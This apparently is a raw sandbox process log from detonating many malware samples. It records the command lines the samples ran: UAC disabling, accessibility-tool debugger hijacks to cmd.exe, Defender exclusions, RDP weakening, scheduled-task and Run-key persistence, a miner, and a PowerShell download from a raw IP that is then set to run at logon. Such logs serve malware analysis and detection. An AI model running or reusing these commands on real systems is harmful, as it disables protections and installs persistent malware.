C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Quzg8YkU0P.bat"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7876 -ip 7876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7876 -s 536
C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
C:\Users\Admin\Downloads\UrlHausFiles\hfs.exe
"C:\Users\Admin\Downloads\UrlHausFiles\hfs.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\Downloads\UrlHausFiles\wow.exe
"C:\Users\Admin\Downloads\UrlHausFiles\wow.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
C:\Users\Admin\Downloads\UrlHausFiles\sound.exe
"C:\Users\Admin\Downloads\UrlHausFiles\sound.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd
C:\Users\Admin\Downloads\UrlHausFiles\logon.exe
"C:\Users\Admin\Downloads\UrlHausFiles\logon.exe"
C:\Users\Admin\Downloads\UrlHausFiles\build.exe
"C:\Users\Admin\Downloads\UrlHausFiles\build.exe"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\Downloads\UrlHausFiles\mi.exe
"C:\Users\Admin\Downloads\UrlHausFiles\mi.exe"
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\add.bat" "
C:\Users\Admin\Downloads\UrlHausFiles\IMG001.exe
"C:\Users\Admin\Downloads\UrlHausFiles\IMG001.exe"
C:\Users\Admin\AppData\Local\Temp\6174.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\6174.tmp.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\'
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
C:\Users\Admin\Downloads\UrlHausFiles\1188%E7%83%88%E7%84%B0.exe
"C:\Users\Admin\Downloads\UrlHausFiles\1188%E7%83%88%E7%84%B0.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im tftp.exe
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\Downloads\UrlHausFiles\c2.exe
"C:\Users\Admin\Downloads\UrlHausFiles\c2.exe"
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
C:\Windows\SYSTEM32\notepad.exe
notepad.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
C:\Users\Admin\Downloads\UrlHausFiles\Ammyy.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Ammyy.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6728 -ip 6728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 1308
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\networks.ps1"
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1640 -ip 1640
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{A216281A-61ED-46A4-F26C-4347B2F31750}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 1372
C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'AutoUpdate.exe'
C:\Users\Admin\Downloads\UrlHausFiles\client.exe
"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\Downloads\UrlHausFiles\stail.exe
"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted')
C:\Users\Admin\AppData\Local\Temp\tftp.exe
"C:\Users\Admin\AppData\Local\Temp\tftp.exe"
C:\Users\Admin\AppData\Local\Temp\is-7IIHE.tmp\stail.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7IIHE.tmp\stail.tmp" /SL5="$204B8,3299853,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe
"C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe"
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"
C:\Users\Admin\Downloads\UrlHausFiles\readme.exe
"C:\Users\Admin\Downloads\UrlHausFiles\readme.exe"
C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe
"C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1640 -ip 1640
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause powerful_player_1242
C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe
"C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe" -i
C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe
"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause powerful_player_1242
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3504 -ip 3504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3504 -ip 3504
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\967E.tmp\968F.tmp\9690.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1488
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1520
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x320 0x4a8
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"
C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe
C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcc45b46f8,0x7ffcc45b4708,0x7ffcc45b4718
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'NGUBAPK.exe'
C:\Users\Admin\AppData\Local\Temp\10000341101\stail.exe
"C:\Users\Admin\AppData\Local\Temp\10000341101\stail.exe"
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"
C:\Users\Admin\AppData\Local\Temp\is-5DRQB.tmp\stail.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5DRQB.tmp\stail.tmp" /SL5="$503AA,3299853,54272,C:\Users\Admin\AppData\Local\Temp\10000341101\stail.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im tftp.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4704 -ip 4704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1276
C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE
"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B38C.tmp\B38D.tmp\B38E.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"
C:\Windows\system32\msg.exe
msg * virus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Windows\system32\msg.exe
msg * virus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 4726' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network4726Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcc45b46f8,0x7ffcc45b4708,0x7ffcc45b4718
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Downloads\UrlHausFiles\build.exe" & rd /s /q "C:\ProgramData\BKECAEBGHDAE" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\DOWNLO~1\URLHAU~1\PowerShell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\tftp.exe
"C:\Users\Admin\AppData\Local\Temp\tftp.exe"
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\Downloads\UrlHausFiles\random.exe
"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"
C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe
"C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\Downloads\UrlHausFiles\app64.exe
"C:\Users\Admin\Downloads\UrlHausFiles\app64.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"
C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
C:\Windows\SysWOW64\powercfg.exe
powercfg /CHANGE -standby-timeout-ac 0
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Windows\system32\cmd.exe
cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"
C:\Users\Admin\Downloads\UrlHausFiles\abc.exe
"C:\Users\Admin\Downloads\UrlHausFiles\abc.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe
"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"
C:\Windows\SysWOW64\powercfg.exe
powercfg /CHANGE -hibernate-timeout-ac 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3236 -ip 3236
C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe
"C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 336
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
C:\Windows\system32\PING.EXE
ping localhost -n 1
C:\Windows\SysWOW64\powercfg.exe
Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe
"C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe"
C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe"
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe"
C:\Users\Admin\Downloads\UrlHausFiles\mimilove.exe
"C:\Users\Admin\Downloads\UrlHausFiles\mimilove.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE"
C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE
C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\bp.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat
C:\Users\Admin\AppData\Local\Temp\is-M62BQ.tmp\KUWAIT~1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M62BQ.tmp\KUWAIT~1.tmp" /SL5="$3044C,3849412,851968,C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE"
C:\Users\Admin\DOWNLO~1\URLHAU~1\bp.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\bp.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\key.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffcd460cc40,0x7ffcd460cc4c,0x7ffcd460cc58
C:\Users\Admin\DOWNLO~1\URLHAU~1\key.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\key.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 228 -ip 228
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\AA_v3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 364
